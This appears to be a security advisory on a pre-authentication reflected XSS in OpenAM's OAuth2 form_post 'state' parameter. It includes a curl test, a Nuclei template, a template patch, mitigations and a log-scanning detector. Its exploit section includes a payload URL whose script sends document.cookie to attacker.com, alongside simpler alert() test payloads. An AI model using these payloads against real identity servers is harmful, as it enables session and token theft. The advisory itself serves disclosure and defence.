OpenAM, Reflected XSS, CVE-2026-XXXXX (Critical) -DC-Jun2026-551


(CVE ID pending assignment; GitHub Advisory published 2026‑06‑21)

How the CVE Works

The OAuth 2.0 / OpenID Connect authorization endpoint in OpenAM implements the `form_post` response mode, which returns an HTML page that auto‑submits a form containing the authorization response parameters. The `state` parameter, which is supplied by the client in the initial authorization request, is embedded directly into this HTML response without proper contextual output encoding.
When an attacker crafts a malicious `state` value containing JavaScript payloads (e.g., "><script>alert(1)</script>), the unsanitized input is reflected in the `FormPostResponse.ftl` FreeMarker template. Because the response is served from the same origin as OpenAM, the injected script executes in the context of the victim’s browser session.
The vulnerability is triggered before authentication – simply by luring a victim to click a specially crafted OAuth2 authorization URL. No valid session or token is required, making it a pre‑authentication (pre‑auth) reflected XSS.
The root cause lies in the template’s failure to escape HTML‑special characters for the `state` parameter when building the auto‑submit form. OpenAM versions 13.0.0 through 16.1.0 are affected; the issue was fixed in 16.1.1 by applying proper output escaping (e.g., FreeMarker’s `?html` built‑in) to all user‑controlled parameters included in the `form_post` response.
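To make the encoding defect concrete, here is an added Python stand-in for the `form_post` page rendering described above. It is not OpenAM code and not the `FormPostResponse.ftl` template itself: `render_form_post_vulnerable` interpolates `state` raw into an attribute value, `render_form_post_fixed` escapes every user-controlled parameter for the HTML attribute context (the same idea as FreeMarker's `?html`), and `contains_injected_script` is a reviewer's check over the rendered output. The redirect URI, code and state values are constructed samples.

```python
"""Contextual output encoding for the OAuth 2.0 form_post response.

Added example (not OpenAM code): a minimal Python stand-in for the
FormPostResponse.ftl template, showing the vulnerable interpolation
beside an escaped version in the spirit of FreeMarker's ?html built-in.
"""
import html

# Constructed sample values: a benign client state and the reflected
# payload shape described in the advisory.
REDIRECT_URI = "https://example.com/callback"
BENIGN_STATE = "abc123"
HOSTILE_STATE = '"><script>alert(1)</script>'


def render_form_post_vulnerable(redirect_uri: str, code: str, state: str) -> str:
    """Template behaviour before the fix: raw interpolation of `state`
    into an attribute value, so a quote in `state` breaks out of it."""
    return (
        '<html><body onload="document.forms[0].submit()">'
        f'<form method="post" action="{redirect_uri}">'
        f'<input type="hidden" name="code" value="{code}"/>'
        f'<input type="hidden" name="state" value="{state}"/>'
        "</form></body></html>"
    )


def html_attr(value: str) -> str:
    """Attribute-context escaping: &, <, >, " and ' become entities, so the
    value can only ever be attribute text, never markup."""
    return html.escape(value, quote=True)


def render_form_post_fixed(redirect_uri: str, code: str, state: str) -> str:
    """Template behaviour after the fix: every user-controlled parameter is
    escaped for the HTML attribute context it lands in."""
    return (
        '<html><body onload="document.forms[0].submit()">'
        f'<form method="post" action="{html_attr(redirect_uri)}">'
        f'<input type="hidden" name="code" value="{html_attr(code)}"/>'
        f'<input type="hidden" name="state" value="{html_attr(state)}"/>'
        "</form></body></html>"
    )


def contains_injected_script(page: str) -> bool:
    """Check a reviewer can run on rendered output: a legitimate form_post
    page carries no <script> element, so any hit means a parameter
    escaped its attribute context."""
    return "<script" in page.lower()


if __name__ == "__main__":
    vuln = render_form_post_vulnerable(REDIRECT_URI, "AUTHCODE", HOSTILE_STATE)
    fixed = render_form_post_fixed(REDIRECT_URI, "AUTHCODE", HOSTILE_STATE)
    print("vulnerable render injects script:", contains_injected_script(vuln))  # True
    print("fixed render injects script:     ", contains_injected_script(fixed))  # False
    print(fixed)
```

The point of `html_attr` is that the escaping is chosen for the context the value lands in (a double-quoted attribute), which is why `"` must be encoded as well as `<` and `>`; encoding only angle brackets would still let a quote terminate the attribute and start a new one.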

An attacker can exploit this to:

  • Steal session cookies (if not HttpOnly) or OAuth tokens,
  • Perform actions on behalf of the victim within the OpenAM realm,
  • Redirect the user to a phishing site,
  • Deface the OpenAM login page,
  • Bypass CSRF protections that rely on the `state` parameter.

Because the XSS is reflected and requires user interaction (clicking a link), it is often considered “critical” due to the high impact on confidentiality and integrity, especially in IAM environments where OpenAM is the central authentication hub.

DailyCVE Form

| Field | Value |
|-|-|
| Platform | OpenAM (Open Identity Platform) |
| Version | 13.0.0 – 16.1.0 |
| Vulnerability | Pre‑auth Reflected XSS |
| Severity | Critical |
| Date | 2026‑06‑21 |
| Prediction | Patch expected 2026‑06‑22 |

Analytics – What Undercode Say

“The `state` parameter is the attack vector – sanitize it everywhere.”
Bash commands to test the vulnerability (replace `$OPENAM_HOST` with your target):

```bash
# Craft a malicious state parameter with a simple XSS payload
PAYLOAD='"><script>alert("XSS")</script>'
URL="https://$OPENAM_HOST/openam/oauth2/authorize?response_type=code&client_id=test&redirect_uri=https://example.com/callback&state=$PAYLOAD&response_mode=form_post"
# Send the request and observe the reflected payload in the response
curl -v "$URL" | grep -i "script"
```

Nuclei template snippet (for automated scanning):

```yaml
id: CVE-2026-XXXXX-OpenAM-FormPost-XSS
info:
  name: OpenAM Pre-auth Reflected XSS in form_post state
  severity: critical
  tags: openam,xss,oauth
requests:
  - raw:
      - |
        GET /openam/oauth2/authorize?response_type=code&client_id=test&redirect_uri=https://example.com&state=%22%3E%3Cscript%3Ealert(1)%3C/script%3E&response_mode=form_post HTTP/1.1
        Host: {{Hostname}}
    matchers:
      - type: word
        words:
          - "<script>alert(1)</script>"
        part: body
```

FreeMarker patch example (from `FormPostResponse.ftl`):

```ftl
<#-- Before (vulnerable): state is written into the attribute unescaped -->
<input type="hidden" name="state" value="${state}"/>
<#-- After (fixed in 16.1.1): ?html escapes HTML-special characters -->
<input type="hidden" name="state" value="${state?html}"/>
```

Exploit

  1. Craft the malicious URL with the XSS payload in the `state` parameter.
  2. Deliver the link to an authenticated or unauthenticated user (phishing email, social engineering, etc.).
  3. Victim clicks the link and is redirected to OpenAM’s authorization endpoint.
  4. OpenAM renders the `form_post` response page, which includes the unsanitized `state` value.
  5. The injected JavaScript executes in the victim’s browser, allowing the attacker to:
     – Steal session cookies (if not HttpOnly),
     – Exfiltrate OAuth2 authorization codes or tokens,
     – Perform actions as the victim (e.g., change password, create new users),
     – Redirect the victim to an attacker‑controlled site.

Example exploit URL:

```text
https://openam.example.com/openam/oauth2/authorize?
response_type=code
&client_id=attacker_client
&redirect_uri=https://attacker.com/callback
&state="><script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script>
&response_mode=form_post
```

Protection

  • Upgrade to OpenAM 16.1.1 or later – this is the only complete fix.
  • If upgrade is not immediately possible, apply the patch to `FormPostResponse.ftl` by adding `?html` to all user‑supplied parameters (see patch example above).
  • Enforce a strong Content Security Policy (CSP) that disallows `unsafe-inline` for scripts – this mitigates XSS even if the vulnerability is present.
  • Set `HttpOnly` and `Secure` flags on all session cookies to prevent cookie theft via JavaScript.
  • Validate and sanitize the `state` parameter on the server side – reject any value containing HTML‑special characters or script patterns.
  • Use a Web Application Firewall (WAF) with rules that block reflected XSS patterns in the `state` parameter.
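The server-side validation and WAF bullets above both come down to one rule: an opaque `state` value has no legitimate reason to contain HTML-special characters. The following added Python example (not OpenAM code and not a shipped WAF rule) implements that rule once in `is_suspicious_state`, applies it to a single request URL in `check_authorize_request`, and reuses it in `scan_access_log` to surface past attempts in web-server access logs for the SOC. The endpoint path is the one the advisory names; the log lines are constructed samples in Combined Log Format.

```python
"""Server-side state validation and log-based detection for the form_post
reflection described in this advisory.

Added example (not OpenAM code): a validator a reverse proxy, filter or
WAF rule could apply to the `state` parameter, reused by a scanner over
access logs to find attempts retroactively.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

AUTHORIZE_PATH = "/openam/oauth2/authorize"  # endpoint path from the advisory

# Characters an opaque client state never needs and an HTML-attribute
# breakout always does.
HTML_SPECIAL = re.compile(r'[<>"\'&]')

# Combined Log Format: ip ident user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample log lines: one benign authorize request, one carrying
# the URL-encoded payload shape from the advisory, one unrelated request.
LOG_LINES = [
    '203.0.113.10 - - [21/Jun/2026:10:00:01 +0000] "GET /openam/oauth2/authorize'
    '?response_type=code&client_id=app&redirect_uri=https%3A%2F%2Fexample.com%2Fcb'
    '&state=abc123&response_mode=form_post HTTP/1.1" 200 1042',
    '203.0.113.11 - - [21/Jun/2026:10:00:07 +0000] "GET /openam/oauth2/authorize'
    '?response_type=code&client_id=app&redirect_uri=https%3A%2F%2Fexample.com%2Fcb'
    '&state=%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E&response_mode=form_post HTTP/1.1" 200 1103',
    '203.0.113.12 - - [21/Jun/2026:10:00:09 +0000] "GET /openam/json/authenticate HTTP/1.1" 401 77',
]


def is_suspicious_state(state: str) -> bool:
    """True when the fully URL-decoded state contains HTML-special
    characters. Decoding twice also catches double-encoded submissions
    that a single-decode check would pass through."""
    decoded = unquote(unquote(state))
    return bool(HTML_SPECIAL.search(decoded))


def check_authorize_request(url: str) -> dict:
    """Inspect one request URL (absolute or path+query). Returns a verdict
    dict a filter or SIEM rule can act on; `flagged` is True for an
    authorize request whose state fails validation."""
    parts = urlsplit(url)
    if parts.path != AUTHORIZE_PATH:
        return {"flagged": False, "reason": "not the authorize endpoint"}
    qs = parse_qs(parts.query, keep_blank_values=True)  # parse_qs URL-decodes once
    state = qs.get("state", [""])[0]
    mode = qs.get("response_mode", [""])[0]
    if is_suspicious_state(state):
        return {
            "flagged": True,
            "reason": "html-special characters in state",
            "response_mode": mode,
            "state": state,
        }
    return {"flagged": False, "reason": "state ok"}


def scan_access_log(lines) -> list:
    """Run the same validator over access-log lines and return the hits,
    keeping the client IP, timestamp and HTTP status so an analyst can see
    whether the request was actually served."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        verdict = check_authorize_request(m.group("target"))
        if verdict["flagged"]:
            hits.append({"ip": m.group("ip"), "time": m.group("ts"),
                         "status": m.group("status"), **verdict})
    return hits


if __name__ == "__main__":
    for hit in scan_access_log(LOG_LINES):
        print(hit)
```

The validator is deliberately strict: the OAuth 2.0 `state` value is an opaque token chosen by the client, typically random or base64url, so rejecting quotes, angle brackets and ampersands costs well-behaved clients nothing. Applied at a reverse proxy it is a compensating control while the upgrade is scheduled, not a replacement for the template fix; applied to logs it answers the first incident-response question, whether anyone has already tried this against the deployment.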

Impact

  • Confidentiality: Attacker can steal session cookies, OAuth tokens, and sensitive user data.
  • Integrity: Attacker can perform arbitrary actions on behalf of the victim, including privilege escalation, user creation, and policy changes.
  • Availability: Although not a direct DoS, the XSS can be used to redirect users, cause session confusion, or deface the login portal.
  • Severity: Critical – because OpenAM is the central identity provider for many organisations, compromising a single user’s session can lead to a full domain takeover.
  • Exploitability: Remotely exploitable over the network, low complexity, requires user interaction (clicking a link), but no authentication is needed to trigger the reflection.
  • CISA KEV: Not yet added, but likely to be included given the critical severity and widespread use of OpenAM in enterprise environments.


Sources:

Reported By: github.com
Extra Source Hub: Undercode
